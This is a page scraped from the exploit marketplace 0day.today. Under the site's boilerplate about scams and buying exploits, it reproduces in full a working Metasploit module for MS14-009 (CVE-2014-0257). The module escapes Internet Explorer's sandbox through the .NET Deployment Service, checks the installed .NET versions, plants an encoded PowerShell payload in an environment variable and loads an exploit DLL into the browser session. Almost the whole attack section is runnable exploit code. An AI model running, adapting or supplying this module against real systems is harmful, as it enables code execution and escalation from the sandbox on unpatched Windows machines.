0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
MS14-009 .NET Deployment Service IE Sandbox Escape Exploit
## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex' require 'msf/core/exploit/exe' require 'msf/core/exploit/powershell' class Metasploit3 < Msf::Exploit::Local Rank = GreatRanking include Msf::Exploit::Powershell include Msf::Exploit::EXE include Msf::Post::Windows::Priv include Msf::Post::Windows::FileInfo include Msf::Post::File NET_VERSIONS = { '4.5' => { 'dfsvc' => '4.0.30319.17929.17', 'mscorlib' => '4.0.30319.18063.18' }, '4.5.1' => { 'dfsvc' => '4.0.30319.18408.18', 'mscorlib' => '4.0.30319.18444.18' } } def initialize(info={}) super( update_info( info, 'Name' => 'MS14-009 .NET Deployment Service IE Sandbox Escape', 'Description' => %q{ This module abuses a process creation policy in the Internet Explorer Sandbox which allows to escape the Enhanced Protected Mode and execute code with Medium Integrity. The problem exists in the .NET Deployment Service (dfsvc.exe), which can be run as Medium Integrity Level. Further interaction with the component allows to escape the Enhanced Protected Mode and execute arbitrary code with Medium Integrity. }, 'License' => MSF_LICENSE, 'Author' => [ 'James Forshaw', # Vulnerability Discovery and original exploit code 'juan vazquez' # metasploit module ], 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [ [ 'IE 8 - 11', { } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'WfsDelay' => 30 }, 'DisclosureDate'=> "Feb 11 2014", 'References' => [ ['CVE', '2014-0257'], ['MSB', 'MS14-009'], ['BID', '65417'], ['URL', 'https://github.com/tyranid/IE11SandboxEscapes'] ] )) end def check unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe") return Exploit::CheckCode::Unknown end net_version = get_net_version if net_version.empty? return Exploit::CheckCode::Unknown end unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll") return Exploit::CheckCode::Detected end mscorlib_version = get_mscorlib_version if Gem::Version.new(mscorlib_version) >= Gem::Version.new(NET_VERSIONS[net_version]["mscorlib"]) return Exploit::CheckCode::Safe end Exploit::CheckCode::Vulnerable end def get_net_version net_version = "" dfsvc_version = file_version("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe") dfsvc_version = dfsvc_version.join(".") NET_VERSIONS.each do |k,v| if v["dfsvc"] == dfsvc_version net_version = k end end net_version end def get_mscorlib_version mscorlib_version = file_version("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll") mscorlib_version.join(".") end def exploit print_status("Running module against #{sysinfo['Computer']}") unless sysinfo.nil? mod_handle = session.railgun.kernel32.GetModuleHandleA('iexplore.exe') if mod_handle['return'] == 0 fail_with(Failure::NotVulnerable, "Not running inside an Internet Explorer process") end unless get_integrity_level == INTEGRITY_LEVEL_SID[:low] fail_with(Failure::NotVulnerable, "Not running at Low Integrity") end print_status("Searching .NET Deployment Service (dfsvc.exe)...") unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe") fail_with(Failure::NotVulnerable, ".NET Deployment Service (dfsvc.exe) not found") end net_version = get_net_version if net_version.empty? fail_with(Failure::NotVulnerable, "This module only targets .NET Deployment Service from .NET 4.5 and .NET 4.5.1") end print_good(".NET Deployment Service from .NET #{net_version} found.") print_status("Checking if .NET is patched...") unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll") fail_with(Failure::NotVulnerable, ".NET Installation can not be verified (mscorlib.dll not found)") end mscorlib_version = get_mscorlib_version if Gem::Version.new(mscorlib_version) >= Gem::Version.new(NET_VERSIONS[net_version]["mscorlib"]) fail_with(Failure::NotVulnerable, ".NET Installation not vulnerable") end print_good(".NET looks vulnerable, exploiting...") cmd = cmd_psh_payload(payload.encoded).gsub('%COMSPEC% /B /C start powershell.exe ','').strip session.railgun.kernel32.SetEnvironmentVariableA("PSHCMD", cmd) temp = get_env('TEMP') print_status("Loading Exploit Library...") session.core.load_library( 'LibraryFilePath' => ::File.join(Msf::Config.data_directory, "exploits", "CVE-2014-0257", "CVE-2014-0257.dll"), 'TargetFilePath' => temp + "\\CVE-2014-0257.dll", 'UploadLibrary' => true, 'Extension' => false, 'SaveToDisk' => false ) end def cleanup session.railgun.kernel32.SetEnvironmentVariableA("PSHCMD", nil) super end end # 0day.today [2024-12-29] #